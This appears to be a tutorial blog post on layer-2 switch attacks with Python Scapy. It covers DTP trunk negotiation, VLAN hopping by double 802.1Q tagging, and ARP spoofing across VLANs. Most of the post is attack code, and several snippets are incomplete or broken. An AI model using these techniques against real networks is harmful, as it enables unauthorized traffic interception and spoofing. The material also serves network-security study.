If a Cisco switch enabled DTP protocol on an interface, attacker can use their laptop send the Dynamic desirable frame to the interface, there for, the target interface will become Trunking port. This means we can modify our switch’s VLAN configuration and sniff any VLAN’s traffic.


The library Scapy has a packet scapy.contrib.dtp, which contains negotiate_trunk method,the content is:

def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):

    print "Trying to negotiate a trunk on interface %s" % iface

    p = Dot3(src=mymac, dst="01:00:0c:cc:cc:cc")/LLC()/SNAP()/DTP(tlvlist=[DTPDomain(),DTPStatus(),DTPType(),DTPNeighbor(neighbor=mymac)])



  • The first parameter is the interface name which is listening to the traffic.
  • The second parameter is optional, which is dodgy MAC address of the fake switch, if you don’t specify one, system will generate one randomly.

Create a code to mimic the Cisco Trunk desirable frame, which can be sent to :

import sys
from scapy.layers.ls import Dot3,LLC,SNAP
from scapy.contrib.dtp import *

if len(sys.argv)<2:
 print sys.argv[0]+"<dev>"

VLAN hopping attack



Basic knowledge: http://frankfu.click/security/ccna-security/secure-the-lan.html/2/

Think about this scenario: a host A in VLAN1 send an ping packet to a host B in VLAN 2. We can use Library Scapy to create the Mal-created tag:


Now we create a ICMP packet across VLAN:



from scapy.all import *   


packet = Ether(dst="c0:d3:de:ad:be:ef") / \

                Dot1Q(vlan=1) / \

                Dot1Q(vlan=2) / \

                IP(dst="") / \





We specified the MAC address and IP address in the code above, and added double VLAN tags, first tag is the VLAN tag of the sending host, second tag is the target host’s VLAN tag. The switch will rip off the first tag, then read the second one and send the Frame to the target host.

ARP spoof cross VLAN


Because the VLAN separates the broadcast domain, the previous code can be useful only in one VLAN. If you want to spoof cross VLANs, you have to insert the VLAN tags, following code will make this happen:


  def build_req():

        if options.target is None:

            pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])

        elif options.target:

            target_mac = getmacbyip(options.target)

            if target_mac is None:

                print "[-] Error: Could not resolve targets MAC address"


            pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)


        return pkt

Then we insert the Tag part:

   pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)